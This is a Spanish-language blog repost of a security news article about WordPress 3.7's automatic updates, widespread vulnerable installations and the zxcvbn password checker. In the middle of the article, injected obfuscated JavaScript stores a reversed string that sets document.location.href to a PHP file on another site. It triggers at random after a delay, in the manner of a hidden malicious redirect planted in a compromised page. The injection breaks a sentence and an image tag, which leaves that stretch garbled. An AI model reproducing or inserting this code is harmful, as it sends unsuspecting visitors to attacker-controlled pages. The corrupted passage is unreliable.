Actualizaciones automáticas a partir de WordPress 3.7
WordPress, el popular gestor de contenidos orientado a la creación de
blogs, marca un antes y un después en su política de seguridad tras
publicar la versión 3.7, nombre en clave “Basie”.
La principal característica es la capacidad de actualizaciones autónomas
a partir de esta versión. WordPress no anunciará al administrador que
hay actualizaciones disponibles sino que directamente se actualizará con
los parches de mantenimiento y seguridad que se vayan publicando. Eso
sí, existe una opción para filtrar según que tipo de actualización esté
disponible. Por ejemplo, podremos decidir si también actualizamos los
complementos y temas al igual que el núcleo de WordPress o dejar su
actualización a nuestro cargo.
WordPress se suma así a la tendencia que popularizó Google Chrome:
Actualizaciones transparentes al usuario. Un paso que no se ha dado sin
motivación.
Recientemente, un estudio realizado por WP WhiteSecurity, determinó que
más de un 70% sobre una base de más de 40.000 instalaciones eran
vulnerables. Algunas versiones detectadas, como la 3.3.1, con hasta 24
vulnerabilidades sin parchear. Esto sin contar los innumerables
complementos y temas con agujeros críticos de seguridad que permiten el
compromiso del sitio con relativa facilidad. Como muestra: una búsqueda
de exploits para WordPress en el sitio www.exploit-db.com devuelve 7
resultados para complementos y temas… tan solo en el mes de octubre, y
la mayoría de ellos permite subir archivos de manera arbitraria o
inyección ciega de código SQL.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toe92FCUUaM/s1600/Exploits_Wordpress.png” width=”1251″ height=”883″ /></p>
<p>Dentro de las estadísticas internas del equipo Antifraude de Hispasec,<br />
Wordpress suele copar los primeros pues<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos de plataformas usadas para
alojar malware o phishing, casi siempre, eso si, muy cerca de otro CMS
popular: Joomla.
Otra característica interesante es la integración de la librería
‘zxcvbn’. Esta librería, escrita en su mayor parte en Coffescript,
realiza un análisis de la contraseña con la que el usuario va a
autenticarse en el sistema indicándole cuando esta es considerada débil.
Esto servirá para paliar en parte la elección de contraseñas sencillas
que favorecen las posibilidades de éxito en ataques de fuerza bruta,
diccionario o híbridos sobre cuentas de usuarios.
Finalmente, en el documento de cambios, señalan también que se han
solucionado más de 400 tickets de mantenimiento. Esta versión no incluye
ningún parche de seguridad más allá de las mejoras comentadas.
Sin lugar a dudas una versión interesante desde el punto de vista de la
seguridad que podría ayudar a acortar la ventana de exposición ante
vulnerabilidades publicadas.
__________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Siguenos
en facebook
Los comentarios están cerrados.